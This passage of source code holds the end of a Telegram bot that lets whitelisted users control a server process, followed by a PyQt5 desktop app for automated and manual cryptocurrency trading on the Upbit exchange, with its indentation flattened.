bot.reply_to(message, 'Unable to stop the server. Try again /stop or contact admin')
@bot.message_handler(commands=['output','o'])
def info_server(message):
global process
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Server is not yet started! Use /start to start the server")
else:
out = out_log()
if not out:
bot.reply_to(message, 'No output yet!')
else:
string = ''.join(out)
                    numoftime = len(string)//4096 + 1 # has to split the message if it's too long
for i in range(1,numoftime +1):
part = out[len(out)//numoftime*(i-1):len(out)//numoftime*i]
bot.reply_to(message,''.join(part))
except Exception as e:
print('Error in info ' + str(e))
@bot.message_handler(commands=['command' , 'c'])
def exec_command(message):
global process
global t
global q
try:
if message.from_user.username in config['whitelist']:
if process is None:
bot.reply_to(message, "Server is not yet started! Use /start to start the server")
else:
command = message.text.replace('/command ' , '')
if 'stop' in command:
bot.reply_to(message,'To stop the server use /stop command!')
elif not process.stdin.closed :
command += "\n"
process.stdin.write(command.encode())
process.stdin.flush()
                    bot.reply_to(message, 'Command executed! Type /output to see the output')
else:
bot.reply_to(message, 'Unable to use this command right now, /stop the server and /start again')
except Exception as e:
print('Error in command ' + str(e))
@bot.message_handler(commands=['reload_config'])
def fetch_whitelist(message):
global config
try:
if message.from_user.username in config['whitelist']:
with open(config_path) as configFile:
config = json.load(configFile)
bot.reply_to(message, 'Config File reloaded')
except Exception as e:
print('Error during reload config command ' + str(e))
@bot.message_handler(commands=['ping'])
def ping_server(message):
try:
if message.from_user.username in config['whitelist']:
bot.reply_to(message , 'pong')
except Exception as e:
print('Error during ping command ' + str(e))
bot.polling()
|
main.py
|
import configparser
import sys
from operator import itemgetter
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt, QTimer
from PyQt5.QtGui import QIcon
import requests
import quotation_func
import exchange_func
import config
import time
import datetime
import schedule
import random
import multiprocessing as mp
import threading
class MyWindow(QMainWindow):
def __init__(self):
super().__init__()
# self.setGeometry(100, 200, 300, 200)
self.setWindowTitle("Coin Trade")
self.btnSearch = QPushButton("시세조회", self)
self.btnSearch.move(1200, 100)
self.btnSearch.setToolTip('Search Market')
self.btnSearch.clicked.connect(self.search_today_ticker)
self.btnSearchAccount = QPushButton("계좌조회", self)
self.btnSearchAccount.move(1200, 130)
self.btnSearchAccount.clicked.connect(self.search_account)
self.btnTrade = QPushButton("매매", self)
self.btnTrade.move(1300, 130)
self.btnTrade.clicked.connect(self.trade_coin)
self.chbAutoTrade = QCheckBox("자동매매", self)
self.chbAutoTrade.move(1310, 160)
# self.chbAutoTrade.stateChanged.connect(self.start_auto_trade)
self.btnCalcProfit = QPushButton("수익률 계산", self)
self.btnCalcProfit.move(1200, 160)
self.btnCalcProfit.clicked.connect(self.calc_top_item_profit)
self.txtProfit10 = QTextEdit(self)
self.txtProfit10.move(1200, 200)
self.txtProfit20 = QTextEdit(self)
self.txtProfit20.move(1200, 250)
        # KRW market list
self.marketTable = QTableWidget(4, 3, self)
self.marketTable.setGeometry(10, 100, 200, 300)
        # today's ticker list
self.tickerTableLabel = QLabel("당일 시세", self)
self.tickerTableLabel.move(10, 70)
self.tickerTable = QTableWidget(self)
self.tickerTable.setGeometry(10, 100, 1150, 400)
self.tickerTable.doubleClicked.connect(self.ticker_double_clicked)
self.tickerTable.setContextMenuPolicy(Qt.ActionsContextMenu)
        self.tickerTable.setSelectionBehavior(QAbstractItemView.SelectRows) # select whole rows
        self.tickerTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # disable cell editing
ticker_add_favor_action = QAction('계속 보유에 추가', self.tickerTable)
ticker_add_except_action = QAction('거래 제외에 추가', self.tickerTable)
ticker_buy_coin_action = QAction('매수', self.tickerTable)
self.tickerTable.addAction(ticker_add_favor_action)
self.tickerTable.addAction(ticker_add_except_action)
self.tickerTable.addAction(ticker_buy_coin_action)
ticker_add_favor_action.triggered.connect(self.ticker_add_favor)
ticker_add_except_action.triggered.connect(self.ticker_add_except)
ticker_buy_coin_action.triggered.connect(self.ticker_buy_coin)
        # held markets (account holdings) list
self.accountTableLabel = QLabel("보유 종목", self)
self.accountTableLabel.move(10, 500)
self.accountTable = QTableWidget(0, 0, self)
self.accountTable.setGeometry(10, 530, 650, 300)
self.accountTable.setContextMenuPolicy(Qt.ActionsContextMenu)
        self.accountTable.setSelectionBehavior(QAbstractItemView.SelectRows) # select whole rows
        self.accountTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # disable cell editing
acc_add_favor_action = QAction('계속 보유에 추가', self.accountTable)
acc_add_except_action = QAction('거래 제외에 추가', self.accountTable)
acc_sell_coin_action = QAction('매도', self.accountTable)
self.accountTable.addAction(acc_add_favor_action)
self.accountTable.addAction(acc_add_except_action)
self.accountTable.addAction(acc_sell_coin_action)
acc_add_favor_action.triggered.connect(self.acc_add_favor)
acc_add_except_action.triggered.connect(self.acc_add_except)
acc_sell_coin_action.triggered.connect(self.acc_sell_coin)
        # favorite markets list (markets to keep holding)
self.favorMarketTableLabel = QLabel("보유 대상 종목", self)
self.favorMarketTableLabel.move(700, 500)
self.favorMarketTable = QTableWidget(0, 1, self)
self.favorMarketTable.setGeometry(700, 530, 130, 300)
        self.favorMarketTable.horizontalHeader().setVisible(False) # hide the column header
        self.favorMarketTable.setSelectionBehavior(QAbstractItemView.SelectRows) # select whole rows
        self.favorMarketTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # disable cell editing
self.favorMarketTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.favorMarketTable.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
remove_favor_action = QAction('제거', self.favorMarketTable)
self.favorMarketTable.addAction(remove_favor_action)
remove_favor_action.triggered.connect(self.favor_remove_market)
        # excluded markets list (markets excluded from trading)
self.exceptMarketTableLabel = QLabel("제외 대상 종목", self)
self.exceptMarketTableLabel.move(850, 500)
self.exceptMarketTable = QTableWidget(0, 1, self)
self.exceptMarketTable.setGeometry(850, 530, 130, 300)
        self.exceptMarketTable.horizontalHeader().setVisible(False) # hide the column header
        self.exceptMarketTable.setSelectionBehavior(QAbstractItemView.SelectRows) # select whole rows
        self.exceptMarketTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # disable cell editing
self.exceptMarketTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.exceptMarketTable.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
remove_except_action = QAction('제거', self.exceptMarketTable)
self.exceptMarketTable.addAction(remove_except_action)
remove_except_action.triggered.connect(self.except_remove_market)
        # buy candidates
self.buyTableLabel = QLabel("매수 대상", self)
self.buyTableLabel.move(1000, 500)
self.buyTable = QTableWidget(0, 1, self)
self.buyTable.setGeometry(1000, 530, 130, 130)
        self.buyTable.horizontalHeader().setVisible(False) # hide the column header
        self.buyTable.setSelectionBehavior(QAbstractItemView.SelectRows) # select whole rows
        self.buyTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # disable cell editing
self.buyTable.setContextMenuPolicy(Qt.ActionsContextMenu)
        # sell candidates
self.sellTableLabel = QLabel("매도 대상", self)
self.sellTableLabel.move(1000, 670)
self.sellTable = QTableWidget(0, 1, self)
self.sellTable.setGeometry(1000, 700, 130, 130)
        self.sellTable.horizontalHeader().setVisible(False) # hide the column header
        self.sellTable.setSelectionBehavior(QAbstractItemView.SelectRows) # select whole rows
        self.sellTable.setEditTriggers(QAbstractItemView.NoEditTriggers) # disable cell editing
self.sellTable.setContextMenuPolicy(Qt.ActionsContextMenu)
# MarketCap List
self.marketCapTableLabel = QLabel("마켓 순위", self)
self.marketCapTableLabel.move(1200, 320)
self.marketCapTable = QTableWidget(0, 1, self)
self.marketCapTable.setGeometry(1200, 350, 200, 500)
self.marketCapTable.setContextMenuPolicy(Qt.ActionsContextMenu)
self.statusBar().showMessage('Ready')
self.exitAction = QAction(QIcon('exit.png'), 'Exit', self)
self.exitAction.setShortcut('Ctrl+Q')
self.exitAction.setStatusTip('Exit application')
self.exitAction.triggered.connect(qApp.quit)
self.searched_user_api_key = []
self.watch_market_list = []
# Kimchi Coin List
self.kimchi_market_list = []
self.kimchi_time = False
self.timer_one = QTimer()
self.timer_one.setInterval(60000)
self.timer_one.timeout.connect(self.do_time_schedule)
self.timer_one.start()
        # screen layout (menu bar and toolbar)
menu_bar = self.menuBar()
menu_bar.setNativeMenuBar(False)
file_menu = menu_bar.addMenu('&File')
file_menu.addAction(self.exitAction)
self.toolbar = self.addToolBar('Exit')
self.toolbar.addAction(self.exitAction)
        # run immediately at startup
self.init_func()
    # tasks performed when the window starts
def init_func(self):
self.config_add_favor()
self.do_time_schedule()
self.chbAutoTrade.setChecked(True)
'''
def keyPressEvent(self, e):
if e.key() == Qt.Key_Escape:
self.close()
elif e.key() == Qt.Key_F:
self.showFullScreen()
elif e.key() == Qt.Key_N:
self.showNormal()
def mousePressEvent(self, e):
if e.buttons() & Qt.LeftButton:
print('LEFT')
if e.buttons() & Qt.RightButton:
print('RIGHT')
'''
'''
    Run when the auto-trade checkbox state changes
def start_auto_trade(self, state):
print('chbox1 : ' + str(state))
if state:
print('ok')
'''
def ticker_double_clicked(self):
row = self.tickerTable.currentRow()
col = self.tickerTable.currentColumn()
item = self.tickerTable.currentItem()
print(row, col, item, item.text())
def ticker_add_favor(self):
market = self.tickerTable.item(self.tickerTable.currentRow(), 0).text()
# print('tickerTable_add_favor', item)
self.favorMarketTable.insertRow(self.favorMarketTable.rowCount())
self.favorMarketTable.setItem(self.favorMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
        # add to the ini file
self.update_config_market('I', 'FAVOR', market)
def ticker_add_except(self):
market = self.tickerTable.item(self.tickerTable.currentRow(), 0).text()
# print('tickerTable_add_except', item)
self.exceptMarketTable.insertRow(self.exceptMarketTable.rowCount())
self.exceptMarketTable.setItem(self.exceptMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
        # add to the ini file
self.update_config_market('I', 'EXCEPT', market)
def acc_add_favor(self):
market = self.accountTable.item(self.accountTable.currentRow(), 5).text() + '-' + \
self.accountTable.item(self.accountTable.currentRow(), 0).text()
# print('tickerTable_add_favor', item)
self.favorMarketTable.insertRow(self.favorMarketTable.rowCount())
self.favorMarketTable.setItem(self.favorMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
        # add to the ini file
self.update_config_market('I', 'FAVOR', market)
def acc_add_except(self):
market = self.accountTable.item(self.accountTable.currentRow(), 5).text() + '-' + \
self.accountTable.item(self.accountTable.currentRow(), 0).text()
# print('tickerTable_add_except', item)
self.exceptMarketTable.insertRow(self.exceptMarketTable.rowCount())
self.exceptMarketTable.setItem(self.exceptMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
        # add to the ini file
self.update_config_market('I', 'EXCEPT', market)
def favor_remove_market(self):
market = self.favorMarketTable.item(self.favorMarketTable.currentRow(), 0).text()
self.update_config_market('D', 'FAVOR', market)
self.favorMarketTable.removeRow(self.favorMarketTable.currentRow())
def except_remove_market(self):
market = self.exceptMarketTable.item(self.exceptMarketTable.currentRow(), 0).text()
self.update_config_market('D', 'EXCEPT', market)
self.exceptMarketTable.removeRow(self.exceptMarketTable.currentRow())
    # reflect the entries registered in the config file on the screen
def config_add_favor(self):
config_file = configparser.ConfigParser()
if config_file.read(config.ini_file_name, encoding='utf-8'):
            # check whether the section exists and set the values
if config_file.has_section('MARKET'):
                # load the favorite (keep-holding) markets
if config_file.has_option('MARKET', 'FAVOR'):
favor_market = config_file['MARKET']['FAVOR'].split(',')
for market in favor_market:
self.favorMarketTable.insertRow(self.favorMarketTable.rowCount())
self.favorMarketTable.setItem(self.favorMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
                # load the excluded markets
if config_file.has_option('MARKET', 'EXCEPT'):
except_market = config_file['MARKET']['EXCEPT'].split(',')
for market in except_market:
self.exceptMarketTable.insertRow(self.exceptMarketTable.rowCount())
self.exceptMarketTable.setItem(self.exceptMarketTable.rowCount() -1, 0, QTableWidgetItem(market))
                # load the major coin list
for i in range(1, 5):
section = 't' + str(i)
if config_file.has_option('MARKET', section):
major_market = config_file['MARKET'][section].split(',')
for market in major_market:
self.watch_market_list.append(market)
                # load the kimchi coin list
for i in range(1, 5):
section = 'kimchi' + str(i)
if config_file.has_option('MARKET', section):
kimchi_market = config_file['MARKET'][section].split(',')
for market in kimchi_market:
self.kimchi_market_list.append(market)
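    # For reference (not part of the original source), the [MARKET] section read
    # above is expected to look roughly like this in the ini file; the market
    # codes below are placeholders:
    # [MARKET]
    # FAVOR = KRW-BTC,KRW-ETH
    # EXCEPT = KRW-XRP
    # t1 = KRW-BTC,KRW-ETH
    # kimchi1 = KRW-BORA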
def search_account_market(self):
account_market = []
for row in range(0, self.accountTable.rowCount()):
market = self.accountTable.item(row, 5).text() + '-' + self.accountTable.item(row, 0).text()
# print(row, market)
if self.accountTable.item(row, 5).text() != self.accountTable.item(row, 0).text() and \
self.accountTable.item(row, 0).text() != 'VTHO':
account_market.append(market)
return account_market
def buy_coin(self, order_market, side_val, hoga_level=0, buy_volume=0, buy_amount=0):
orderbook_market = order_market
orderbook_list = quotation_func.search_orderbook(orderbook_market)
price = 0
position_amount = 0
if len(orderbook_list) == 0:
print(' order book Data Not Found')
return
if side_val == 'bid' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['ask_price'],
# orderbook_list[1][4][hoga_level]['ask_size'])
price = orderbook_list[1][4][hoga_level]['ask_price']
elif side_val == 'bid' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['bid_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['bid_size'])
price = orderbook_list[1][4][abs(hoga_level + 1)]['bid_price']
elif side_val == 'ask' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['bid_price'],
# orderbook_list[1][4][hoga_level]['bid_size'])
price = orderbook_list[1][4][hoga_level]['bid_price']
elif side_val == 'ask' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['ask_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['ask_size'])
price = orderbook_list[1][4][abs(hoga_level + 1)]['ask_price']
order_market_currency = order_market.split('-')[0]
# print('BUY ', order_market.split('-')[1], ' from ', order_market.split('-')[0])
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
if accounts_res.status_code == 200:
for acc in accounts_res.json():
if acc['currency'] == order_market_currency:
position_amount = float(acc['balance'])
else:
print('account search error occurred')
return False
if buy_volume > 0:
volume = buy_volume
trade_amount = volume * price
if trade_amount > position_amount:
print('Order amount exceeds the available cash balance.')
return False
elif buy_amount > position_amount:
print('Order amount exceeds the available cash balance.')
return False
elif buy_amount < 0:
print('Order amount is less than zero.')
return False
elif buy_amount == 0:
trade_amount = config.amount_per_order
volume = round(trade_amount / price, 3)
if trade_amount > position_amount:
print('Order amount exceeds the available cash balance.')
return False
else:
trade_amount = buy_amount
volume = round(trade_amount / price, 3)
if trade_amount > position_amount:
print('Order amount exceeds the available cash balance.')
return False
# print('volume : ', volume, ' , price : ', price, ' , trade_amount : ', trade_amount, ' , position_amount : ', position_amount)
if trade_amount > position_amount:
print('Order amount exceeds the available cash balance.')
return False
else:
# Create the order
order_query = {'market': orderbook_list[1][0], 'side': side_val,  # bid = buy / ask = sell
'volume': volume, 'price': price, 'ord_type': 'limit'}
# print(order_query)
exchange_func.create_orders(order_query)
# Refresh account holdings after the trade
self.search_account()
def sell_coin(self, order_market, side_val, hoga_level=0, sell_volume=0, sell_percent=0):
orderbook_market = order_market
orderbook_list = quotation_func.search_orderbook(orderbook_market)
price = 0
volume = 0
if side_val == 'bid' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['ask_price'],
# orderbook_list[1][4][hoga_level]['ask_size'])
price = float(orderbook_list[1][4][hoga_level]['ask_price'])
elif side_val == 'bid' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['bid_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['bid_size'])
price = float(orderbook_list[1][4][abs(hoga_level + 1)]['bid_price'])
elif side_val == 'ask' and hoga_level >= 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][hoga_level]['bid_price'],
# orderbook_list[1][4][hoga_level]['bid_size'])
price = float(orderbook_list[1][4][hoga_level]['bid_price'])
elif side_val == 'ask' and hoga_level < 0:
# print("check >> ", orderbook_list[1][0], orderbook_list[1][4][abs(hoga_level+1)]['ask_price'],
# orderbook_list[1][4][abs(hoga_level+1)]['ask_size'])
price = float(orderbook_list[1][4][abs(hoga_level + 1)]['ask_price'])
if sell_volume > 0:
volume = float(sell_volume)
elif sell_percent > 0:
order_market_currency = order_market.split('-')[1]
print('SELL ', order_market.split('-')[1], ' to ', order_market.split('-')[0])
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
if accounts_res.status_code == 200:
for acc in accounts_res.json():
if acc['currency'] == order_market_currency:
# print('avg_buy_price:', acc['avg_buy_price'], ', price: ', price)
volume = round(float(acc['balance']) * float(sell_percent) / 100, 3)
else:
print('account search error occurred')
return False
else:
order_market_currency = order_market.split('-')[1]
# print(order_market_currency)
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
if accounts_res.status_code == 200:
for acc in accounts_res.json():
if acc['currency'] == order_market_currency:
# print('avg_buy_price:', acc['avg_buy_price'], ', price: ', price)
volume = float(acc['balance'])
else:
print('account search error occurred')
return False
# Execute the sell order only when amount and volume were computed correctly
if volume > 0 and price > 0:
# Create the order
order_query = {'market': orderbook_list[1][0], 'side': side_val,  # bid = buy / ask = sell
'volume': volume, 'price': price, 'ord_type': 'limit'}
# print(order_query)
exchange_func.create_orders(order_query)
else:
print('There is a problem with the amount or volume.', str(volume), str(price))
# Refresh account holdings after the trade
self.search_account()
def search_market(self):
result_data = quotation_func.search_market_list()
self.marketTable.setColumnCount(len(result_data[0]))
self.marketTable.setRowCount(len(result_data))
column_headers = ['Base Currency', 'Market Code', 'Korean Name', 'English Name']
self.marketTable.setHorizontalHeaderLabels(column_headers)
for row, market in enumerate(result_data):
for col, val in enumerate(market):
item = QTableWidgetItem(val)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.marketTable.setItem(row, col, item)
self.marketTable.resizeColumnsToContents()
self.marketTable.resizeRowsToContents()
# print(self.findChild(QTableWidget, name='qtable'))
def search_account(self):
# Before trading, check that an API KEY exists and store it in config
self.searched_user_api_key = exchange_func.search_api_key()
# print('search : ', self.searched_user_api_key)
if self.searched_user_api_key['access_key'] == 'NONE':
print(">>> No User KEY ")
# TODO function to handle screen input; executed here for testing
# exchange_func.insert_api_key()
row = 0
self.accountTable.setRowCount(row)
# Fetch account information
accounts_res = exchange_func.search_accounts(self.searched_user_api_key)
for row, acc in enumerate(accounts_res.json()):
# print('current holdings : ', row, ' ', acc)
# VTHO cannot be traded, so it is excluded
if acc['currency'] == 'VTHO':
continue
if row == 0:
column_headers = list(acc.keys())
column_headers.append('buy amount')
column_headers.append('cur amount')
column_headers.append('rate')
self.accountTable.setColumnCount(len(column_headers))
self.accountTable.setHorizontalHeaderLabels(column_headers)
self.accountTable.setColumnWidth(0, 70)
self.accountTable.setColumnWidth(8, 60)
if acc['currency'] != acc['unit_currency']:
config.position_market.append([datetime.datetime.now(), acc['unit_currency'] + '-' + acc['currency']])
self.accountTable.insertRow(row)
for col, val in enumerate(acc.values()):
item = QTableWidgetItem(str(''))
if col in (2, 4):
self.accountTable.setColumnHidden(col, True)
# print(val)
elif col == 1:
if acc['currency'] == acc['unit_currency']:
val = 0
else:
val = val
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
elif col == 3:
val = round(float(val), 3)
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
else:
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.accountTable.setItem(row, col, item)
if acc['currency'] == acc['unit_currency']:
item = QTableWidgetItem(str(round(float(acc['balance']))))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 6, item)
else:
buy_price = float(acc['avg_buy_price'])
buy_amt = round(float(acc['balance']) * buy_price)
item = QTableWidgetItem(str(buy_amt))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 6, item)
market = acc['unit_currency'] + '-' + acc['currency']
for ticker_row in range(0, self.tickerTable.rowCount()):
if market == self.tickerTable.item(ticker_row, 0).text():
# print(ticker_row, ' ', market, ' ', self.tickerTable.item(ticker_row, 9).text())
item = QTableWidgetItem(self.tickerTable.item(ticker_row, 9).text())
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 7, item)
cur_price = float(self.tickerTable.item(ticker_row, 9).text())
# print('cur_price : ', cur_price)
rate = round((cur_price - buy_price) / buy_price * 100, 1)
item = QTableWidgetItem(str(rate))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
self.accountTable.setItem(row, 8, item)
# self.accountTable.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.accountTable.horizontalHeader().setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)
# Trade the targets that were found
def trade_coin(self):
# print(' trade_coin START ', datetime.datetime.now())
# Markets to keep holding
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
# Markets not to hold
except_market = []
for row in range(0, self.exceptMarketTable.rowCount()):
except_market.append(self.exceptMarketTable.item(row, 0).text())
# Buy targets
buy_market = []
for row in range(0, self.buyTable.rowCount()):
buy_market.append(self.buyTable.item(row, 0).text())
# Sell targets
sell_market = []
for row in range(0, self.sellTable.rowCount()):
sell_market.append(self.sellTable.item(row, 0).text())
# Currently held markets
account_market = self.search_account_market()
# print(account_market)
# Process sell targets among current holdings
for market in account_market:
# Sell if the market is in the except list
if market in except_market:
if market != 'KRW-VTHO':
print(market, ' except target, SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
# Sell if it is in the sell list but not in the favor list
if market in sell_market and \
market not in favor_market:
print(market, ' sell target, SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
# Buy favor-list markets that are not currently held
for market in favor_market:
if market not in account_market:
print(market, ' favor target, BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
# Buy buy-list markets that are not held and not in the except list
for market in buy_market:
if market not in account_market and \
market not in except_market:
print(market, ' buy target, BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
# print(' trade_coin END ', datetime.datetime.now())
# Trade the targets that were found
def buy_kimchi_coin(self):
# print(' buy_kimchi_coin START ', datetime.datetime.now())
# Markets to keep holding
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
# Markets not to hold
except_market = []
for row in range(0, self.exceptMarketTable.rowCount()):
except_market.append(self.exceptMarketTable.item(row, 0).text())
# Buy targets
buy_market = []
for row in range(0, self.buyTable.rowCount()):
buy_market.append(self.buyTable.item(row, 0).text())
# Sell targets
sell_market = []
for row in range(0, self.sellTable.rowCount()):
sell_market.append(self.sellTable.item(row, 0).text())
# Currently held markets
account_market = self.search_account_market()
# print(account_market)
# Buy kimchi-list markets that are not currently held
# print(self.kimchi_market_list)
for market in self.kimchi_market_list:
if market not in account_market and \
market not in except_market and \
market not in sell_market:
# Give priority to markets that have not risen within the last 30 hourly candles
candle_1h = quotation_func.search_candle_chart(market, "minutes", 60, 30)
up_yn = 0  # initialize so the check below works even if no candle rose
for candle in candle_1h[1:]:
if (float(candle[6]) - float(candle[3])) / float(candle[3]) >= 0.2:
# print('Already Up')
up_yn = 1
break
if up_yn == 1:
add_rate = 1.5
else:
add_rate = 1
# Pick targets at random
buy_rate = random.random()
# print('random :', buy_rate, ' , add_rate : ', add_rate)
buy_rate = buy_rate * add_rate
if buy_rate >= 0.7:
print(market, ' kimchi target, BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
time.sleep(0.2)
# print(' buy_kimchi_coin END ', datetime.datetime.now())
# Trade the targets that were found
def sell_kimchi_coin(self):
# print(' sell_kimchi_coin START ', datetime.datetime.now())
# Markets to keep holding
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
# Markets not to hold
except_market = []
for row in range(0, self.exceptMarketTable.rowCount()):
except_market.append(self.exceptMarketTable.item(row, 0).text())
# Buy targets
buy_market = []
for row in range(0, self.buyTable.rowCount()):
buy_market.append(self.buyTable.item(row, 0).text())
# Sell targets
sell_market = []
for row in range(0, self.sellTable.rowCount()):
sell_market.append(self.sellTable.item(row, 0).text())
# Currently held markets
account_market = self.search_account_market()
# print(account_market)
# Process sell targets among current holdings
for market in account_market:
# Sell held kimchi-list markets that are not in the favor or buy lists
if market in self.kimchi_market_list and \
market not in favor_market and \
market not in buy_market:
print(market, ' kimchi target, SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
time.sleep(0.2)
# print(' sell_kimchi_coin END ', datetime.datetime.now())
# Fetch today's ticker data
def search_today_ticker(self):
result_data = quotation_func.search_market_list()
# print(result_data)
market_list_all = []
for market in result_data:
market_list_all.append(market[1])
day_ticker_result = quotation_func.search_ticker(market_list_all)
# print(day_ticker_result)
self.tickerTable.setColumnCount(len(day_ticker_result[0]))
self.tickerTable.setRowCount(len(day_ticker_result) - 1)
column_headers = day_ticker_result[0]
sorted_day_ticker_result = sorted(day_ticker_result[1:], key=itemgetter(18), reverse=True)
self.tickerTable.setHorizontalHeaderLabels(column_headers)
# self.tickerTable.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# self.tickerTable.setColumnHidden(2, True)
for row, market in enumerate(sorted_day_ticker_result):
# print(market)
for col, val in enumerate(market):
# if row == 0:
# print(val)
if col in (1, 2, 3, 4, 5, 12, 13, 16, 19, 20, 25):
val = ''
self.tickerTable.setColumnHidden(col, True)
elif col == 15:
val = round(float(val) * 100, 2)
elif col in (17, 18):
val = round(val / 1000000)
item = QTableWidgetItem(str(val))
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tickerTable.setItem(row, col, item)
# Calculate the rate of return within the top ranks
def calc_profit(self, rank):
rowcount = self.tickerTable.rowCount()
if rank > rowcount:
return False
buy_amount = 10000
sum_value = 0
for i in range(0, rank):
# print(self.tickerTable.item(i, 0).text(), ' : ', self.tickerTable.item(i, 6).text(),
# self.tickerTable.item(i, 15).text(),
# round(float(self.tickerTable.item(i, 6).text()) *
# float(self.tickerTable.item(i, 15).text()) / 100,2))
# Profit amount for each market
sum_value = sum_value + buy_amount * float(self.tickerTable.item(i, 15).text()) / 100
# Calculate the average rate of return
return round(sum_value / rank / 100, 3)
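# calc_profit above assumes a notional buy_amount of 10,000 per market and
# returns the summed profit divided by the number of ranked markets and by
# 100 (a scaled average per-market profit), which calc_top_item_profit below
# writes into the profit text fields.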
def calc_top_item_profit(self):
self.txtProfit10.setText(str(self.calc_profit(10)))
self.txtProfit20.setText(str(self.calc_profit(50)))
def search_market_list(self):
# print("############# market list ###########")
url = "https://api.upbit.com/v1/market/all"
querystring = {"isDetails": "false"}
response = requests.request("GET", url, params=querystring)
# print(response.text)
markets = []
# currencies = ["KRW", "BTC", "USDT"]
currencies = ["KRW"]
i = 0
for currency in currencies:
# print(type(list(result.values())), result)
for result in response.json():
if result['market'].find(currency) == 0:
# currencies.append("KRW")
if i == 0:
pass
else:
markets.append(list(result.values()))
# The title row is removed, so the index is shifted by -1
markets[i-1].insert(0, currency)
i += 1
# print(markets)
return markets
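# Each element returned by the Upbit /v1/market/all endpoint looks roughly
# like {"market": "KRW-BTC", "korean_name": "...", "english_name": "Bitcoin"}
# (illustrative values), so list(result.values()) above yields
# [market, korean_name, english_name] per row.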
def ticker_buy_coin(self):
market = self.tickerTable.item(self.tickerTable.currentRow(), 0).text()
print(market, ' TICKER MANUAL BUY')
self.buy_coin(market, 'bid', 0, 0, 0)
def acc_sell_coin(self):
market = self.accountTable.item(self.accountTable.currentRow(), 5).text() + '-' + \
self.accountTable.item(self.accountTable.currentRow(), 0).text()
print(market, ' ACCOUNT MANUAL SELL')
self.sell_coin(market, 'ask', 0, 0, 0)
def sell_all_coin(self):
print(time.strftime('%Y%m%d %H%M%S'), ' : sell_all_coin start')
# Collect every currently held market as a sell target
sell_target = self.search_account_market()
# print(sell_target)
# Place orders for the found targets
for market in sell_target:
self.sell_coin(market, 'ask', 0, 0, 0)
time.sleep(0.5)
# Select markets whose trading volume is surging
def buy_trade_volume_increase(self):
# print(' buy_trade_volume_increase START ', datetime.datetime.now())
ticks_target = []
trade_market_list = quotation_func.search_market_list()
# print(trade_market_list)
for market in trade_market_list[:50]:
order, day_market = quotation_func.search_ticks(market[1], 300)
if day_market != 'X':
ticks_target.append([order, day_market])
time.sleep(0.3)
# Sort by instantaneous traded volume
ticks_target.sort()
cur_time = datetime.datetime.now().strftime('%Y%m%d %H:%M:%S')
if len(ticks_target) > 0:
print(cur_time, ' : ticks_target all : ', ticks_target)
# Place orders for the found targets
for target in ticks_target:
market = target[1]
print('aa', target, ' xx ', market)
item = QTableWidgetItem(market)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
row = self.buyTable.rowCount()
self.buyTable.insertRow(row)  # a row must exist before setItem can populate it
self.buyTable.setItem(row, 0, item)
self.buyTable.setItem(row, 1, QTableWidgetItem(cur_time))
# Find rising markets based on trading volume and the 1-minute candles
buy_list = quotation_func.find_buy_target_by_amount(trade_market_list[:50])
for market in buy_list:
item = QTableWidgetItem(market)
